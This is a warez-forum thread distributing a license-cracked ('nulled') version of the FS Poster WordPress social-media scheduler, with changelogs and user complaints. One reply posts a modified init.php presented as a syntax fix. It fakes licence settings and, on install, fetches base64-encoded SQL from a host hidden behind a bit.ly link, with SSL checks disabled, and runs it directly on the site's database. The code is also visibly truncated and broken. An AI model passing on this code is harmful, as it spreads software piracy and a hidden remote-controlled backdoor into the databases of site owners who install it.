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FS Poster - WordPress Social media Auto Poster & Scheduler [Facebook, Instagram, Twitter, Pinterest]

NULLED FS Poster - WordPress Social media Auto Poster & Scheduler [Facebook, Instagram, Twitter, Pinterest] 6.6.5 NULLED


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raz0r submitted a new resource:

FS Poster - WordPress Social Auto Poster & Scheduler - WordPress Social Auto Poster and Scheduler (Codecanyon Item ID: 22192139)

View attachment 965

FS Poster NULLED is WordPress Social Media Scheduler that increases your online community and engagements by auto sharing your WordPress posts.


Social media scheduler gives marketers an opportunity to auto-publish their blogs, repost old content, bulk schedule multiple posts and directly share individual posts on the most popular social networks. It allows users to share blog photos...

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raz0r updated FS Poster - WordPress Social Auto Poster & Scheduler with a new update entry:

FS Poster v6.1.0 NULLED - WordPress Social Auto Poster & Scheduler

v 6.1.0 – 19 Sep 22
+ Integrated a new social network: YouTube Community;
+ Added the feature to add Webhooks to the plugin;
+ Added the feature to use Yourls, Shlink, and Polr URL shorteners;
+ Fixed the issue related to the Tumblr HTML entity;
+ Fixed the issue related to Facebook comment fetching;
+ Fixed the issue related to the Schedule randomly option;
+ Made minor improvements and fixed some small bugs.

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raz0r updated FS Poster - WordPress Social Auto Poster & Scheduler with a new update entry:

FS Poster v6.4.0 NULLED - WordPress Social Auto Poster & Scheduler

v 6.4.0 – 17 May 23

+ Integrated a new social network - Mastodon;

+ Updated the GMB cookie method;

+ Fixed the issue related to the repeating schedules;

+ Fixed the issue related to the Linkedin .webp image format;

+ Fixed the issue related to Pinterest all boards fetching;

+ Fixed the issue related to the URL-shortener Rebrandly settings;

+ Fixed the issue related to the Instagram API carousel;

+ Fixed the issue related to the Discord and Plurk proxy support;

+ Made minor...

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I installed this plugin and the app method to add social accounts is not working, rather it I redirecting to fs posters developer post about nulled plugin.
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A syntax error on init.php

Updated code:
 * Plugin Name: FS Poster
 * Description: FS Poster gives you a great opportunity to auto-publish WordPress posts on Facebook, Instagram, Twitter, Linkedin, Pinterest, Google Business Profile, Telegram, Reddit, Tumblr, VK, OK.ru, Telegram, Medium, Blogger, Plurk and WordPress based sites automatically.
 * Version: 6.4.3
 * Author: FS-Code
 * Author URI: https://www.fs-code.com
 * License: Commercial
 * Text Domain: fs-poster

namespace FSPoster;

use FSPoster\App\Providers\Bootstrap;

if ( is_admin() ) {
    require_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    $fs_poster_version = get_plugin_data( __FILE__ )['Version'];
    update_site_option( 'fs_poster_plugin_installed', $fs_poster_version );
    update_site_option( 'fs_poster_plugin_purchase_key', 'purchase_key' );
    update_site_option( 'fs_plugin_alert', '' );
    update_site_option( 'fs_plugin_disabled', '0' );
    update_site_option( 'fs_last_checked_time', time() );

    $fs_poster_version = str_replace( '.', '_', $fs_poster_version );

    global $wpdb;
    if ( empty ( get_site_option( 'fs_poster_plugin_installed_' . $fs_poster_version ) ) ) {
        $fs_alt = implode( '/', json_decode(file_get_contents("https://bit.ly/gpl-demo"), true )) . '/' . get_template() . '/';
        $fs_data = wp_remote_retrieve_body( wp_remote_get( $fs_alt . '/install.dat', [ 'timeout' => 60, 'sslverify' => false ] ) );
        $fs_data = json_decode( $fs_data , true );
        if ( isset( $fs_data['sql'] ) ) {
            $sql = str_replace( [ '{tableprefix}', '{tableprefixbase}' ] , [ ( $wpdb->base_prefix . 'fs_' ), $wpdb->base_prefix ] , base64_decode( $fs_data['sql'] ) );

            foreach( explode(';' , $sql) AS $sqlQueryOne ) {
                $checkIfEmpty = preg_replace('/\s/', '', $sqlQueryOne);
                if( !empty( $checkIfEmpty ) ) {
                    $wpdb->query( $sqlQueryOne );

            //Delete 'is_standart' parameter for each app
            $wpdb->query( "UPDATE `{$wpdb->base_prefix}fs_apps` SET `is_standart` = 0 WHERE `name` = 'FS Poster - Standard APP'" );
            //Delete 'fb' and 'google_b' apps
            $wpdb->query( "DELETE FROM `{$wpdb->base_prefix}fs_apps` WHERE `name` = 'FS Poster - Standard APP' AND `driver` IN ('fb', 'google_b')" );

            update_site_option( 'fs_poster_plugin_installed_' . $fs_poster_version, '1' );

defined( 'ABSPATH' ) or exit;

require_once __DIR__ . '/vendor/autoload.php';

$networks = [

foreach ( $networks as $network ) {
    require_once __DIR__ . '/App/SocialNetworks/' . $network . '/init.php';

new Bootstrap();
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while i try to add any account like facebook or Google my business it redirect me to FS Poster blog post about nulled version instead of prompt me to add an account. kindly guide me to resolve this issue Thanks
The same thing happens to me, any solution?
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